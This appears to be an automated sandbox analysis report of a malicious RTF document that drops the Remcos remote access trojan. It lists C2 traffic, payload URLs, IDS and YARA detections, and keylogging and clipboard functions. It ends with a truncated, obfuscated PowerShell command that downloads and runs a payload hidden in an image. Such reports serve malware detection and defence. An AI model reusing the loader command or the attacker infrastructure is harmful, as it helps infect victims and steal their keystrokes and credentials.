                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162

                Networking

                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49164 -> 45.90.89.98:8243
                Source: Network traffic | Suricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 45.90.89.123:80 -> 192.168.2.22:49163
                Source: Network traffic | Suricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 45.90.89.123:80 -> 192.168.2.22:49163
                Source: Network traffic | Suricata IDS: 2049038 - Severity 1 - ET MALWARE Malicious Base64 Encoded Payload In Image : 207.241.227.96:443 -> 192.168.2.22:49162
                Source: Malware configuration extractor | URLs: 45.90.89.98
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 45.90.89.98:8243
                Source: global traffic | HTTP traffic detected: GET /2/items/new_image_20240905/new_image.jpg HTTP/1.1 Host: ia601706.us.archive.org Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /421/UNOST.txt HTTP/1.1 Host: 45.90.89.123 Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
                Source: Joe Sandbox View | IP Address: 45.90.89.98
                Source: Joe Sandbox View | IP Address: 178.237.33.50
                Source: Joe Sandbox View | ASN Name: INTERNET-ARCHIVEUS
                Source: Joe Sandbox View | ASN Name: CMCSUS
                Source: Joe Sandbox View | ASN Name: CMCSUS
                Source: Joe Sandbox View | JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                Source: Network traffic | Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.22:49165 -> 178.237.33.50:80
                Source: global traffic | HTTP traffic detected: GET /421/seennewthingsentireworldseethethings.tIF HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 45.90.89.123 Connection: Keep-Alive
                Source: unknown | HTTPS traffic detected: 207.241.227.96:443 -> 192.168.2.22:49162 version: TLS 1.0
                Source: unknown | TCP traffic detected without corresponding DNS query: 45.90.89.123
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_0041B411 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,9_2_0041B411
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{EA4CB5E2-DBE3-4260-9610-CCFF5325F098}.tmp
                Source: powershell.exe, 00000008.00000002.400552613.0000000004D80000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                Source: global traffic | DNS traffic detected: DNS query: ia601706.us.archive.org
                Source: global traffic | DNS traffic detected: DNS query: geoplugin.net
                Source: powershell.exe, 00000008.00000002.398173022.00000000029D9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://45.90.89.123
                Source: powershell.exe, 00000008.00000002.398173022.00000000029D9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://45.90.89.123/421/UNOST.txt
                Source: EQNEDT32.EXE, 00000002.00000002.380189170.00000000005ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.90.89.123/421/seennewthingsentireworldseethethings.tIF
                Source: EQNEDT32.EXE, 00000002.00000002.380189170.00000000005ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.90.89.123/421/seennewthingsentireworldseethethings.tIFj
                Source: EQNEDT32.EXE, 00000002.00000002.380189170.00000000005ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.90.89.123/421/seennewthingsentireworldseethethings.tIFr
                Source: powershell.exe, 00000008.00000002.400552613.0000000004D80000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                Source: powershell.exe, 00000008.00000002.400552613.0000000004D80000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                Source: powershell.exe, 00000008.00000002.400552613.0000000004D80000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.entrust.net/2048ca.crl0
                Source: powershell.exe, 00000008.00000002.400552613.0000000004D80000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.entrust.net/server1.crl0
                Source: powershell.exe, 00000008.00000002.400552613.0000000004D80000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: powershell.exe, 00000008.00000002.400552613.0000000004D80000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                Source: powershell.exe, 00000008.00000002.400552613.0000000004D80000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                Source: RegAsm.exe, RegAsm.exe, 00000009.00000002.906391209.000000000093F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp
                Source: RegAsm.exe, 00000009.00000002.906391209.00000000008F5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp&
                Source: powershell.exe, 00000008.00000002.398638126.00000000043B9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp/C
                Source: RegAsm.exe, 00000009.00000002.906391209.00000000008F5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp=
                Source: powershell.exe, 00000008.00000002.398059563.000000000078A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://go.microsoft.c
                Source: powershell.exe, 00000008.00000002.398638126.00000000037A9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000008.00000002.400552613.0000000004D80000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
                Source: powershell.exe, 00000008.00000002.400552613.0000000004D80000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0%
                Source: powershell.exe, 00000008.00000002.400552613.0000000004D80000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0-
                Source: powershell.exe, 00000008.00000002.400552613.0000000004D80000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0/
                Source: powershell.exe, 00000008.00000002.400552613.0000000004D80000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com05
                Source: powershell.exe, 00000008.00000002.400552613.0000000004D80000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.entrust.net03
                Source: powershell.exe, 00000008.00000002.400552613.0000000004D80000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.entrust.net0D
                Source: powershell.exe, 00000006.00000002.402026819.0000000002781000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.398173022.0000000002781000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000008.00000002.400552613.0000000004D80000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.digicert.com.my/cps.htm02
                Source: powershell.exe, 00000008.00000002.400552613.0000000004D80000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                Source: powershell.exe, 00000008.00000002.398638126.00000000037A9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000008.00000002.398638126.00000000037A9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000008.00000002.398638126.00000000037A9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 00000008.00000002.398173022.00000000028B9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ia601706.us.archive.org
                Source: powershell.exe, 00000008.00000002.397979353.0000000000530000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg
                Source: powershell.exe, 00000006.00000002.402026819.0000000002970000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ia601706.us.archive.org/2/items/new_image_LR
                Source: powershell.exe, 00000008.00000002.398638126.00000000037A9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
                Source: powershell.exe, 00000008.00000002.400552613.0000000004D80000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://secure.comodo.com/CPS0
                Source: unknown | Network traffic detected: HTTP traffic on port 49162 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49162

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,00000000 9_2_0040A2F3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,9_2_0040B749
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,9_2_004168FC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_0040A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,9_2_0040A41B
                Source: Yara match | File source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 8.2.powershell.exe.46deb20.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 8.2.powershell.exe.46deb20.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.398638126.00000000043B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: powershell.exe PID: 3644, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 3752, type: MEMORYSTR

                E-Banking Fraud

                Source: Yara match | File source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 8.2.powershell.exe.46deb20.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 8.2.powershell.exe.46deb20.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000009.00000002.906391209.0000000000911000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.398638126.00000000043B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: powershell.exe PID: 3644, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 3752, type: MEMORYSTR

                Spam, unwanted Advertisements and Ransom Demands

                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_0041CA73 SystemParametersInfoW,9_2_0041CA73

                System Summary

                barindex
                Source: xnHel.rtf, type: SAMPLE Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                Source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
                Source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
                Source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 8.2.powershell.exe.46deb20.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 8.2.powershell.exe.46deb20.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
                Source: 8.2.powershell.exe.46deb20.1.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 8.2.powershell.exe.46deb20.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 8.2.powershell.exe.46deb20.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
                Source: 8.2.powershell.exe.46deb20.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
                Source: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 00000008.00000002.398638126.00000000043B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: powershell.exe PID: 3536, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 3644, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: powershell.exe PID: 3644, type: MEMORYSTR Matched rule: Detects Invoke-Mimikatz String Author: Florian Roth
                Source: Process Memory Space: powershell.exe PID: 3644, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: RegAsm.exe PID: 3752, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: C:\Users\user\Desktop\~WRD0000.tmp, type: DROPPED Matched rule: detects CVE-2017-8759 weaponized RTF documents. Author: ditekSHen
                Source: C:\Windows\SysWOW64\wscript.exe Process created: Commandline size = 9286
                Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? 